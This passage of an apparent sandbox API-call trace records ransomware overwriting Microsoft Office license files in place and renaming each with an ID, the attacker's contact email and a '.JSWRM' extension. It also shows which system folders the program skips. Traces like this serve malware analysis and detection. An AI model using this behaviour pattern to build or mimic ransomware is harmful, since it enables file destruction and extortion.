lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0108.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.340] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11638) returned 1 [0108.340] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0108.340] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0108.342] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.342] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0108.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.343] CloseHandle (hObject=0x45c) returned 1 [0108.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0108.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0108.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0108.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0108.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0108.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0108.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.343] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0108.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0108.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0108.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.344] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe98ac95e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe98ac95e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe999178a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bc3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_Subscription-pl.xrm-ms", cAlternateFileName="PR87CD~1.XRM")) returned 1 [0108.344] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0108.344] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0108.344] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0108.344] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0108.345] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned -1 [0108.345] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.345] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.345] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.345] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.345] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0108.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0108.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0108.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0108.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0108.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0108.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.346] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11203) returned 1 [0108.346] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0108.346] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0108.348] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.348] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0108.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.348] CloseHandle (hObject=0x45c) returned 1 [0108.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0108.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0108.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0108.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0108.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0108.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0108.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.349] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0108.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0108.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0108.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.350] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9886703, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9886703, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe991f0d5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x535c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_Subscription-ppd.xrm-ms", cAlternateFileName="PR18B8~1.XRM")) returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.350] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0108.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0108.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0108.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0108.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0108.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0108.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0108.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0108.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0108.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.351] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21340) returned 1 [0108.352] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5350) returned 0x24c1d0 [0108.352] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5350, lpOverlapped=0x0) returned 1 [0108.354] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.354] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5350, lpOverlapped=0x0) returned 1 [0108.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.354] CloseHandle (hObject=0x45c) returned 1 [0108.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0108.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0108.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0108.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0108.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0108.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0108.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.355] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0108.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0108.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0108.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.356] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe98604a1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe98604a1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe98f8e19, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d82, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="PRB9CC~1.XRM")) returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.356] lstrcmpiW (lpString1="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0108.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0108.356] RtlAllocateHeap (HeapHandle=0x1e0000, 